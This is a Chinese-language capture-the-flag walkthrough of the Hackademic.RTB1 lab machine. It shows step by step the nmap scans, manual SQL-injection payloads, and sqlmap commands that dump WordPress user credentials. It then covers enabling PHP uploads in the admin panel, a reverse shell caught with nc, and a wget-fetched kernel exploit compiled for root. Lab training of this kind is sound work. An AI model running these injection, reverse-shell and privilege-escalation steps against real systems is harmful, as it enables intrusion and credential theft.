靶機介紹:
1)靶機名稱:2-Free-Hackademic.RTB1
2)靶機鏈接:
步驟:鏈接:https://pan.baidu.com/s/1IMWhKd3h8sDcPelzXXhxKg 提取碼:o5k0
打靶程序:
1)啟動靶機,選擇網路模式為僅主機模式,由此可確定靶機地址段為192.168.56.0/24


2)通過nmap進行掃描,掃描192.168.56.0/24存活主機
#nmap -sP 192.168.56.0/24

通過掃描,確認靶機地址為192.168.56.104
3)使用nmap掃描該IP開放的所有埠
#nmap -p- 192.168.56.104

掃描發現,開放80埠
4)對每80埠進行作業服務的指紋掃描(應用服務版本資訊等)
#nmap -p80 -sV -sC 192.168.56.104

5)訪問web頁面
http://192.168.56.104/

6)點擊標題“Hackademic_RTB1”,出現如下頁面

7)點擊Got root,發現地址欄引數發生變化,http://192.168.56.104/Hackademic_RTB1/?p=9

8)對該URL進行SQL注入測驗,判斷是否存在SQL注入漏洞
http://192.168.56.104/Hackademic_RTB1/?p=9
http://192.168.56.104/Hackademic_RTB1/?p=9'
頁面無明顯變化,說明此處無SQL注入漏洞
9)點擊上述頁面最下方的“Uncategorized”發現,URL中的引數發生了變化

10)對上述URL進行SQL注入測驗,頁面發生了變化,說明存在SQL注入漏洞
http://192.168.56.104/Hackademic_RTB1/?cat=1
http://192.168.56.104/Hackademic_RTB1/?cat=1'

11)手動測驗
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=1 order by 6
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,2,3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,databases(),3,4,5
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
http://192.168.56.104/Hackademic_RTB1/?cat=1 and 1=2 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='wp_users'
12)SQLmap自動注入
①檢測資料庫型別,證明是否存在sql注入漏洞
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --batch

②獲取資料庫
# sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL --dbs --batch

③獲取wordpress資料庫中的資料表
#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL -D "wordpress" --tables --batch

④獲取wp_users表中的所有欄位
#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL -D "wordpress" -T "wp_users" --columns --batch

⑤獲取user_login和user_pass中的資料
#sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" --dbms=MySQL -D "wordpress" -T "wp_users" -C user_login,user_pass --dump --batch

13)最后一個用戶JohnSmith的user_pass通過md5進行了加密,可以對其進行破解
https://md5.gromweb.com/

14)通過dirserach對網站目錄進行掃描,查看是否可以掃描出web站點的后臺管理頁面
# dirsearch -u "http://192.168.56.104"
# dirsearch -u "http://192.168.56.104/Hackademic_RTB1/"

15)通過訪問掃描出的目錄,發現了web站點后臺地址
http://192.168.56.104/Hackademic_RTB1/wp-admin/

16)通過SQL注入出來的用戶“GeorgeMiller”登入后臺后,配置其可以上傳的檔案型別有php,并點擊更新配置

17)上一步配置完成,后生成一個upload選線,運行上傳PHP檔案

18)下載PHP反彈shell腳本檔案,并在upLoad頁面進行上傳
#php反彈shell腳本檔案下載地址
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
下載完成后,設定腳本中IP地址為kali主機地址(192.168.56.103)


上傳成功后,回傳如下頁面及地址:href='https://www.cnblogs.com/Hackademic_RTB1/wp-content/reverse.php

19)在Kali主機通過nc監聽腳本中設定的埠(1234),并在瀏覽器訪問剛才上傳的php腳本檔案
#nc -lvvp 1234
瀏覽器訪問:http://192.168.56.104/Hackademic_RTB1/wp-content/reverse.php


此時已經成功反彈shell
20)查看當前用戶是否具有sudo權限,提示必須要有一個控制終端
$sudo -s

21)查看當前主機內核為2.6.31
$uname -a

22)在kali主機搜索2.6.31內核對應的本地權限提示腳本
#searchsploit 2.6.3|grep -i "local privilege escalation"

23)將選定的提權腳本復制到Kali本機站點目錄下,并啟動httpd服務
# cp /usr/share/exploitdb/exploits/linux/local/15285.c /var/www/html
# systemctl restart apache2
24)在反彈shell成功后的主機,將上述腳本下載下來
$ cd /tmp
$ wget http://192.168.56.103/15285.c

25)通過gcc編譯
$ gcc -o exp 15285.c
$ ls
$ chmod +x exp

26)獲取flag
#cd /root
#ls
#cat key.txt

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/538163.html
標籤:其他
上一篇:淺學Go下的ssti漏洞問題
